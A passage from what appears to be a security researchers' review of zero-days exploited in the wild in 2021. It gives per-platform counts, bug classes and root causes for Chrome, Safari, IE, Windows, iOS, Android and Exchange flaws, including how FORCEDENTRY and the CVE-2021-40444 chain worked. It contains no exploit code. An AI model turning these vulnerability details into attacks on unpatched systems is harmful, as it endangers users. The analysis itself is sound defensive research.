increase.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghbECEc5FM4UnpQnlj4bXY2ZhDWB0OHbbzaiCJzHPMH_RFJ_XjWa0zHisBvl1zsG09xc-8NvmRdP_3JzT51nge8njHQowYPiDJv8SGngwdj9jPQRfXuJjIJdAAKVvItpE9Zfay-04clFQTGMMA2Xs7kS129D5uLGTV8z8mysT-DdJ8MTSB12jXaCIwew/s1200/image5.png>)\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKGqdhr0uqme9Ta6_IeeH8rLnVORZwThzr_k9HBwWDEdCBAyIaH-Pbza-H6uF9n5-oLmi6LJ7_xA3yI4AkLAvXR2f7e69P3e7RUesU49NJC0wQO6btb8Jr2FCblvcaqmILn3cDItLoPQnaKOKDVVRFdBNtPTxcsug-213zyZC7RtPa3AhRTmOjeGbtgQ/s1200/image2.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmsfv3qdXGZszBVuvB72wozoL0eIwnbnzkCk-34BRZBF42BwEPSlJTZvr7ToosTWWZaGm6-5H0hLWsPVbpuFYVMKeXri8OWB2iIZsG2ZAfMz6q8c_EEXN7yllXpdFpW6l-TeEb_qpIVRRHJ2v9sIk-E54Y0ZX8WowkHS1dfRY-yVPs4J2PqGahA6d_WA/s1200/image3.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it\u2019s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:\n\n * 17 use-after-free\n * 6 out-of-bounds read & write\n * 4 buffer overflow\n * 4 integer overflow\n\nIn the next sections we\u2019ll dive into each major platform that we saw in-the-wild 0-days for this year. We\u2019ll share the trends and explain why what we saw was pretty unexceptional.\n\n## Chromium (Chrome)\n\nChromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.\n\nThe 14 0-day vulnerabilities were in the following components:\n\n * 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))\n * 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) & [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))\n * 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))\n * 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))\n * 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))\n * 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))\n * 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))\n * 1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))\n\nWhen we look at the components targeted by these bugs, they\u2019re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.\n\nA couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there\u2019s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.\n\n[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It\u2019s a type confusion in the TurboFan JIT in Chromium\u2019s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. [CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.\n\n## WebKit (Safari)\n\nPrior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don\u2019t have historical samples to go off of. Instead, we\u2019ll look at 2021\u2019s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days. \n\nThe 7 in-the-wild 0-days targeted the following components:\n\n * 4 Javascript Engine - JavaScript Core ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))\n * 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))\n * 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))\n * 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))\n\nThe one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021. \n\nIt would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there\u2019s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).\n\n## Internet Explorer\n\nSince we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we\u2019ve ever tracked even though Internet Explorer\u2019s market share of web browser users continues to decrease.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEv2CTX5BusrQApQk6Qbg7Gw7nRaqnNvw9rM3vecZitny58CU_peuICwxubQvytpz0IsCl8FlbXIOcpi60ObfVdQK5BNDwxitqQmxXrOQvMMFt9DXgeDZu86EtZwcR58a-UXQlbsCAfoMcAgeaGnLUheSp0W3Ci1GY7lPa8WNHIPsGhBIT58qHBJd28A/s1200/image4.png>)\n\nSo why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn\u2019t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we\u2019ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats. \n\nThe four 0-days targeted the following components:\n\n * MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))\n * Javascript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))\n\nFor [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.\n\n[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.\n\nThere were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.\n\n## Windows\n\nWindows is the platform where we\u2019ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it\u2019s still not especially novel.\n\nIn 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:\n\n * 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))\n * 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))\n * 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>))\n * 1 Windows update medic ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)) \n * 1 SuperFetch ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>))\n * 1 dwmcore.dll ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>))\n * 1 ntfs.sys ([CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>))\n\nThe number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.\n\nSimilar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn\u2019t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>), is due to [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) is a use-after-free in NtGdiResetDC due to the object being freed during the user callback. \n\n## iOS/macOS\n\nAs discussed in the \u201cMore disclosure\u201d section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day ([CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>)) was also found. In this section we\u2019re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxy_vsgAqv3MzrONfxltvMnnsPyONg6TGwm_XGBKBDrRrmjYmFQoSaBcjCAt5wH05oW9Bj531mWuO8l2MmKieN4O0Y--EXSGjsIMEfjUg_CAbBgkKic0_q6ezw0TMbQIaQP0zz9GiguCjQlEUwwtYBv5UOFL6HTMpdMS15v63QYSnG_zxowe7Gcz01lg/s1200/image6.png>)\n\nFor the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:\n\n * IOMobileFrameBuffer ([CVE-2021-30807](<https://support.apple.com/en-us/HT212623>), [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>))\n * XNU Kernel ([CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) & [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>))\n * CoreGraphics ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>))\n * CommCenter ([FORCEDENTRY sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) \\- CVE requested, not yet assigned)\n\nThese 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used [CVE-2016-4654](<https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf>), a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen\u2019s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It\u2019s a popular attack surface because historically it\u2019s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. [CVE-2021-30807](<https://support.apple.com/en-us/HT212623>) is an out-of-bounds read and [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>) is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>).\n\nOne iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU\u2019s inter-process communication (IPC) functionality. [CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) exploited a vulnerability in mach vouchers while [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) exploited a vulnerability in mach messages. This is not the first time we\u2019ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. [CVE-2019-6625](<https://support.apple.com/en-us/HT209443>) was exploited as a part of [an exploit chain targeting iOS 11.4.1-12.1.2](<https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-5.html>) and was also a [vulnerability in mach vouchers](<https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html>). \n\nMach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>) & [CVE-2020-27950](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27950.html>). This year\u2019s [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) is a pretty close variant to 2020\u2019s [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). Tielei Wang and Xinru Chi actually [presented on this vulnerability at zer0con 2021](<https://github.com/wangtielei/Slides/blob/main/zer0con21.pdf>) in April 2021. In their presentation, they explained that they found it while doing variant analysis on [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). [TieLei Wang explained via Twitter](<https://twitter.com/WangTielei/status/1486266258152726530>) that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.\n\nThe two FORCEDENTRY exploits ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) and the [sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>)) were the only times that made us all go \u201cwow!\u201d this year. For [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the integer overflow in CoreGraphics, it was because: \n\n 1. For years we\u2019ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and\n 2. The exploit was an impressive work of art. \n\nThe sandbox escape (CVE requested, not yet assigned) was impressive because it\u2019s one of the few times we\u2019ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs. \n\nFor [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the vulnerability itself wasn\u2019t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Gro\u00df & Ian Beer as \u201cone of the most technically sophisticated exploits [they]\u2019ve ever seen\u201d. [Their blogpost shares all the details](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:\n\nUsing over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.\n\nThe bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.\n\nThis is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.\n\n## Android\n\nThere were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: [CVE-2019-2215](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-2215.html>). Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we\u2019ll compare it to public security research.\n\nFor the 7 Android 0-days they targeted the following components:\n\n * Qualcomm Adreno GPU driver ([CVE-2020-11261](<https://source.android.com/security/bulletin/2021-01-01>), [CVE-2021-1905](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1905.html>), [CVE-2021-1906](<https://source.android.com/security/bulletin/2021-05-01>))\n * ARM Mali GPU driver ([CVE-2021-28663](<https://source.android.com/security/bulletin/2021-05-01>), [CVE-2021-28664](<https://source.android.com/security/bulletin/2021-05-01>))\n * Upstream Linux kernel ([CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>), [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>))\n\n5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against \u201cAndroid devices\u201d, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU. \n\nPublic security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, [Guang Gong](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>), [Man Yue Mo](<https://securitylab.github.com/research/one_day_short_of_a_fullchain_android/>), and [Ben Hawkes](<https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html>) all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver. \n\nThe two non-GPU driver 0-days ([CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) and [CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>)) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it\u2019s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.\n\nThe vulnerability now referred to as [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) was actually found in September 2016 and [discussed on the Linux kernel mailing lists](<https://lore.kernel.org/lkml/CAOssrKcfncAYsQWkfLGFgoOxAQJVT2hYVWdBA6Cw7hhO8RJ_wQ@mail.gmail.com/>). A [patch was even developed back in 2016](<https://lore.kernel.org/lkml/1475150954-10152-1-git-send-email-mszeredi@redhat.com/>), but it didn\u2019t end up being submitted. The bug was finally [fixed in the Linux kernel in July 2021](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cbcf01128d0a92e131bd09f1688fe032480b65ca>) after the detection of the in-the-wild exploit targeting Android. The patch then made it into the [Android security bulletin in November 2021](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>).\n\n[CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>) remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.\n\n## Microsoft Exchange Server\n\nIn 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four ([CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)) were all disclosed and patched at the same time and used together in a [single operation](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The fifth ([CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>)) was patched on its own in November 2021. [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), the attackers would have required at least another 0-day for successful exploitation since [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) is a post-authentication bug.\n\nOf the four Exchange in-the-wild 0-days used in the first campaign, [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), which is also known as \u201cProxyLogon\u201d, is the only one that\u2019s pre-auth. [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>) is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) allowed attackers to write arbitrary files to the system. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.\n\nFor the second campaign, [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), like [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.\n\nWhile there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it\u2019s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don\u2019t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.\n\nWhile this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. 